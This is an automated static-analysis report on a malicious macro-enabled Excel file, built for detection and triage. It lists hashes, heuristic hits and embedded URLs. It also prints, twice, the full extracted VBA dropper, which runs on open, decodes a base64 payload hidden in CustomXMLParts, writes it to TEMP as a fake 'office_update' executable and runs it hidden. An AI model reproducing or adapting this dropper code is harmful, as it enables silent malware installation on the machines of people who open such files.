Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 ef3774d43b3f1b86…

MALICIOUS

Office (OOXML) / .XLSX

Size: 55.9 KB
Created: 2026-03-31 07:07:15 UTC
Authoring application: Microsoft Excel 12.0000
First seen: 2026-06-20
MD5: 18593be421dfbecfbbf927eb4fa94b67
SHA-1: cfcf1b17ad8245eb58698cab86999c25d64c76c4
SHA-256: ef3774d43b3f1b86dc39cda3b2230b9af6447d411eda91abf22e2aec0c0a5d2b
Risk Score: 248

Heuristics (10)

  • VBA project inside OOXML [medium] OOXML_VBA (7 related findings)
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        ' 6. Execute
        Dim shell As Object
        Set shell = CreateObject("WScript.Shell")
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Dim shell As Object
        Set shell = CreateObject("WScript.Shell")
        shell.Run exePath, 0, False
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim xmlNode As Object
        Set xmlDoc = CreateObject("MSXML2.DOMDocument")
        Set xmlNode = xmlDoc.createElement("b64")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
        RunDropper
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        RunDropper
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        ' 3. Prepare paths
        tempPath = Environ("TEMP")
        exePath = tempPath & "\office_update_" & Int((9999 - 1000 + 1) * Rnd + 1000) & ".exe"
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • URL: https://webhook.site/a72d8905-b15f-4e95-9a8f-5e4bb7dc9b3d (in document text: OOXML body / shared strings)
    • URL: http://schemas.microsoft.com/windows/2004/02/mit/task (in document text: OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3800 bytes
SHA-256: a48f50fb7552a4eacf27d60924bbd6f39cc9abfab024b64b6d83cf78829d7374
Preview script
First 1,000 lines of the extracted script
Sub AutoOpen()
    RunDropper
End Sub

Sub Workbook_Open()
    RunDropper
End Sub

' PowerPoint doesn't have an AutoOpen equivalent that runs on file open without an Add-in,
' but it is often triggered via Action Settings or animations. 
' We'll include the core logic here.
Sub OnPPTOpen()
    RunDropper
End Sub

Sub RunDropper()
    On Error Resume Next
    Dim xmlPart As Object
    Dim base64String As String
    Dim tempPath As String
    Dim exePath As String
    Dim binaryData() As Byte
    Dim fNum As Integer
    Dim hostObj As Object

    ' 1. Identify the Correct Host Object
    Select Case Application.Name
        Case "Microsoft Word"
            Set hostObj = ActiveDocument
        Case "Microsoft Excel"
            Set hostObj = ActiveWorkbook
        Case "Microsoft PowerPoint"
            Set hostObj = ActivePresentation
    End Select

    If hostObj Is Nothing Then Exit Sub

    ' 2. Locate the payload in CustomXMLParts
    For Each xmlPart In hostObj.CustomXMLParts
        If xmlPart.DocumentElement.BaseName = "payload" Then
            base64String = xmlPart.DocumentElement.Text
            Exit For
        End If
    Next xmlPart

    If base64String = "" Then Exit Sub

    ' 3. Prepare paths
    tempPath = Environ("TEMP")
    exePath = tempPath & "\office_update_" & Int((9999 - 1000 + 1) * Rnd + 1000) & ".exe"

    ' 4. Decode Base64
    Dim xmlDoc As Object
    Dim xmlNode As Object
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")
    xmlNode.DataType = "bin.base64"
    xmlNode.Text = base64String
    binaryData = xmlNode.nodeTypedValue

    ' 5. Write to disk
    fNum = FreeFile
    Open exePath For Binary Access Write As #fNum
    Put #fNum, , binaryData
    Close #fNum

    ' 6. Execute
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run exePath, 0, False

End Sub

Sub AutoOpen()
    RunDropper
End Sub

Sub Workbook_Open()
    RunDropper
End Sub

' PowerPoint doesn't have an AutoOpen equivalent that runs on file open without an Add-in,
' but it is often triggered via Action Settings or animations. 
' We'll include the core logic here.
Sub OnPPTOpen()
    RunDropper
End Sub

Sub RunDropper()
    On Error Resume Next
    Dim xmlPart As Object
    Dim base64String As String
    Dim tempPath As String
    Dim exePath As String
    Dim binaryData() As Byte
    Dim fNum As Integer
    Dim hostObj As Object

    ' 1. Identify the Correct Host Object
    Select Case Application.Name
        Case "Microsoft Word"
            Set hostObj = ActiveDocument
        Case "Microsoft Excel"
            Set hostObj = ActiveWorkbook
        Case "Microsoft PowerPoint"
            Set hostObj = ActivePresentation
    End Select

    If hostObj Is Nothing Then Exit Sub

    ' 2. Locate the payload in CustomXMLParts
    For Each xmlPart In hostObj.CustomXMLParts
        If xmlPart.DocumentElement.BaseName = "payload" Then
            base64String = xmlPart.DocumentElement.Text
            Exit For
        End If
    Next xmlPart

    If base64String = "" Then Exit Sub

    ' 3. Prepare paths
    tempPath = Environ("TEMP")
    exePath = tempPath & "\office_update_" & Int((9999 - 1000 + 1) * Rnd + 1000) & ".exe"

    ' 4. Decode Base64
    Dim xmlDoc As Object
    Dim xmlNode As Object
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")
    xmlNode.DataType = "bin.base64"
    xmlNode.Text = base64String
    binaryData = xmlNode.nodeTypedValue

    ' 5. Write to disk
    fNum = FreeFile
    Open exePath For Binary Access Write As #fNum
    Put #fNum, , binaryData
    Close #fNum

    ' 6. Execute
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run exePath, 0, False

End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 18432 bytes
SHA-256: 304046c6162c4d842c1638d7f274725d57cf33e43923e614b967e66227dca447
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).